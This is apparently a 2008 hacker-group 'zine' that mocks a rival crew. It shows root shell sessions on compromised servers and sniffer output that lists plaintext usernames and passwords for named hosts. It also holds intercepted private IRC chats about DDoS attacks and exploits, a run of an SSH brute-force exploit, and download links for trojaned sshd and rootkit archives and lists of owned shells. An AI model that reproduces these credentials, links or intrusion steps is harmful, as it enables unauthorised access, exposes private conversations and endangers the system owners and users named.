SSH2_OUT:        user: ronaldo   pass: LANmu80   (nemo.df.ibilce.unesp.br)


central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

SSH2_OUT:     user: root      pass: l3nny1nt3l        (localhost)
SSH2_OUT:     user: lenny     pass: l3nny1nt3l        (localhost)

pass_from:       user: joe       pass: 1207j0s3ph7ys0n9813       (cpe-76-188-180-141.neo.res.rr.com)
pass_from:       user: devel     pass: ha1W0;rlD.0121    (cpe-76-188-180-141.neo.res.rr.com)

pass_from:       user: celtrust  pass: 1207j0s3ph9813    (cpe-76-188-180-141.neo.res.rr.com)

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****

[root[@f1 ~]#
[root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
 05:20:15 up 153 days,  9:30,  0 users,  load average: 2.62, 1.27, 0.63

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
          inet addr:  Bcast:  Mask:

          inet addr:  Bcast:  Mask:


central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##
                 ###   ####       ##     #####    ##       ##

               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****

root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
 12:54:34 up 315 days, 17:40,  4 users,  load average: 0.58, 0.35, 0.27

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
sky      pts/0     11:41    1:12   0.00s  0.00s -bash
sky      pts/3     Tue15   20:53   0.18s  0.00s sshd: sky [priv]

sky      pts/6     11:42    1:10   0.16s  0.01s sshd: sky [priv]
vee      pts/7     12:23   28:41m  0.07s  0.00s telnet seton-3550

          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link

          inet addr:  Bcast:  Mask:
          inet addr:  Bcast:  Mask:

          inet addr:  Bcast:  Mask:
          inet addr:  Bcast:  Mask:

          inet addr:  Bcast:  Mask:
          inet addr:  Bcast:  Mask:

          inet addr:  Bcast:  Mask:

pass_from:         user: simon     pass: pass77    (mail.metrobridge.com)        [whole metrobridge with 
the same pass]

pass_from:         user: sky       pass: rotoFro7  (mail.metrobridge.com)        [whole metrobridge with 
the same pass]

have fun

- what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :(


central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br


                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #

               ####    ###       ####    ### #    ####     ##
                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0

                 **** Linux proxy2-rj i686 ****

root@proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown

 17:14:22 up 97 days,  5:09,  0 users,  load average: 2.16, 1.88, 1.76
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq

pass_from:       user: root      pass: Beth01@   (gwpr03.microlink.com.br)
pass_from:       user: root      pass: pa$$w0rd  (Froes.microlink.com.br)

root@proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT:     user: root      pass: BuCaaAadd         (localhost) -----> /me laughs


central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br

                          ..... !! HELLO WORLD !! .....

                            @@@@@@              @@@@@@
                           @@    @@            @@    @@

                 @@    @@  @@   @@@  @@    @@  @@   @@@  @@    @@
                  @@  @@   @@  @ @@   @@  @@   @@  @ @@   @@  @@
                   IIII    II I  II    IIII    II I  II    IIII
                   IIII    III   II    IIII    III   II    IIII

                  II  II   II    II   II  II   II    II   II  II
                 II    II   IIIIII   II    II   IIIIII   II    II
                 **** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 ****          ->>>> new kool motd, n1cE rIpZ

[root[@noelrosa ~]#

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT 

-;;;;;;; i think thats enough to paste, right ?
-;;;;;;  anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got 
from them

-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/

r47 is r47 () bl4ckh47 org * i own u!            [and We own you!]
r47 on @#combat #osiris @#/<-rad
r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server

r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.

central@labsec [~xoxox/h3h3] # ssh root () bl4ckh47 org -p 2222 bash

root () bl4ckh47 org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)

uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
 10:13:26 up 162 days,  8:25,  0 users,  load average: 0.04, 0.05, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

sit0      Link encap:IPv6-in-IPv4
          inet6 addr: :: Scope:Compat
          inet6 addr: :: Scope:Unknown

          inet6 addr: :: Scope:Compat
          inet6 addr: :: Scope:Compat
          UP RUNNING NOARP  MTU:1480  Metric:1

          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

sit1      Link encap:IPv6-in-IPv4
          inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global

          inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
          inet6 addr: fe80::a00:2fe/64 Scope:Link

          inet6 addr: fe80::a00:204/64 Scope:Link
          inet6 addr: fe80::4d4e:54f2/64 Scope:Link
          UP POINTOPOINT RUNNING NOARP  MTU:1480  Metric:1
          RX packets:16700 errors:0 dropped:0 overruns:0 frame:0

          TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1677861 (1.6 MiB)  TX bytes:982003 (958.9 KiB)

tcp        0      0     ESTABLISHED

tcp6       0      0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667  ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED

tcp6       0      0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED

perl      12655     root    4u  IPv4  3027913       TCP *:65535 (LISTEN)
root     12655  0.0  0.3   5256  3220 ?        S    Mar19   2:39 supervise log

- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks -

<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :u know d0n

<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :he took my nick
<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :he's packeting me

<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change

<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :lamer :(
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :owns my dsl

<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :that d0n guy

<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :had my nick
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :was talking shit

<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target

-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx

-> PRIVMSG d0n ::>
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :the client?

-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh

*********************** run to the hillz he h4s b1tchx 0d4y **********************

-> PRIVMSG d0n :i have windows on linux (vmware)                              ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>

<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :any more fun with efnet soon?

-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :;p

-> PRIVMSG d0n :just sniffing idiots now                                      ->>>>>>>>>>>>>>>>>>>> so we are

*********************** /laugh time ********************************************

-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo br                          ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel

-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal ontem                                ->>>>>>>>>>>>>>>>>>>> some guyz stole 
my network baby

-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick deles                                      ->>>>>>>>>>>>>>>>>>>> i ddosed them and 
got their nicks

-> PRIVMSG accuser :/w psys
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser :hehehe                                                    ->>>>>>>>>>>>>>>>>>>> now i feel gr8

<- :accuser!~psy@ PRIVMSG r47 :eu vi
<- :accuser!~psy@ PRIVMSG r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br poder                             ->>>>>>>>>>>>>>>>>>>> 

-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu mando!                                                 ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara

-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou lamer                                      ->>>>>>>>>>>>>>>>>>>> /me laughs

-> PRIVMSG accuser :rs

-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47                                ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks 
for sharing

-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax  ->>>>>>>>>>>>>>>>>>>> 3h3h3h3

<- :KoaL4!h@ PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara

-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct

<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :ta

<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :com os cara da defland pq

<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso

<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :tu se esquenta

<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :?

-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm manda                                       ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA

-> PRIVMSG \g4br13l\ :sou eu                                            ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show

-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall one                      ----->>>>>>>>>>>>> what the fuck ?

-> PRIVMSG \g4br13l\ :tunnelling by trace                               ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la

*********************** boyfriends are fighting - portuguese only, sorry **********************

-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme

-> PRIVMSG skotch :rs
<- ::skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve 
se para de fica mandando alerta no meu nextel -> gtfo

-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem certeza                                     ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh  isso ?
-> PRIVMSG skotch :ja era ?:

-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc

-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch :CERTEZA?                                             ->>>>>>>> are you sure we are breaking 
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha 
faz tempo

-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vc fala merda e dps quer voltar a tras

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira

-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :mermao n eh a primeira vez

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vem falando bosta

:skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n so esses verme de merda

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q aceita tudo q vc fala

-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :tu soh mostro q n confia

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :aff

-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box

-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec                    ->>>>>> klux has root in importec[their box] (you are 
right sir!)

-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE               ->>>>>> dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q 
vc nem tinha ownado, q eu tinha ownado sozinho

-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n to usando mais importec faz tempo

-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig

-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha 
ownado sozinho
-> PRIVMSG skotch :e vice versa

-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local                      ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on 
milw0rm, asshole)

-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :o openbsd vc a mando faz tempo

-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
-> PRIVMSG skotch :vou te desblokear                  ->>>>>>>>> i'll unblock ya from msn babe! plz come back !

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de 

-> PRIVMSG skotch : *
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/             ->>>>>>> w0w, this is certainly 
a 0day, right ? /me rolling on the floor laughing

-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $

-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows
-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :procura se informar primeiro antes de falar merda

-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh

-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao

-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA

-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :so falo

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q tem gringo

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :te sniffando
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :pq fikei sabendo

-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :nego q ta falando com vc

-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?

-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo

-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :to comend mermao

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :flw

-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo 
de vc

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :ultimamente
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e n trocava ideia antes

<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz

-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh

-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem rs                         ->>>>>> i changed my bnc yesterday! (we're glad)

-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about nothing                   ->>>>>> as always, backstabbing hiZ 


 * Geminid IIb. TCP/UDP/ICMP Packet flooder
 * What can i say? Enjoy! :)
 * gr33tz: PoWerPr0 and godmode0

thanks for the gem source by the way!

there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do

anyway, if we get something else in the future, we will publish again. thanks buddies.
random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log

#       __                 __                __   __                     #
#.----.|  |--.---.-.-----.|  |_.-----.----. |  |_|  |--.----.-----.-----.#

#|  __||     |  _  |  _  ||   _|  -__|   _| |   _|     |   _|  -__|  -__|#
#|____||__|__|___._|   __||____|_____|__|   |____|__|__|__| |_____|_____|#
#                  |__|                                                  #

#                                                                        #
# - download links                                                       #

<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2

<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some 
random ones]

<><> please guyZ, make it priv8 ! (/me rolleyes :B)

- kool&klean chapter.

#              _               _              ___                        #

#         ___ | |_  ___  ___ _| |_ ___  _ _  | | '___  _ _  _ _          #
#        / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_>         #
#        \_|_.|_|_|<___||  _/ |_| \___.|_|   |_| \___/`___||_|           #

#                       |_|                                              #
#                                                                        #
# - conclusion                                                           #


----------------- reflection time
.......... whats the point of all this ? prove that you are better than someone ?
......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.

........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.

..... why would someone send you a mail? nobody cares about you, dipshit.
.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha 
what a joke
... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while 
you can.

.. a kiss to zmda
. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
just to finish:

******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************

; _____          __     _______
;|     |_.---.-.|  |--.|     __|.-----.----.
;|       |  _  ||  _  ||__     ||  -__|  __|

; _______           __               __         __
;|_     _|.-----.--|  |.--.--.-----.|  |_.----.|__|.-----.-----.
; _|   |_ |     |  _  ||  |  |__ --||   _|   _||  ||  -__|__ --|
;|_______||__|__|_____||_____|_____||____|__|  |__||_____|_____|

;                                                               ;
; #LABSEC @ EFNET - closed to friends, of course.
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek

; lAmE ZiNE wRitTeN bY:
; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************

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Full-Disclosure - We believe in it.
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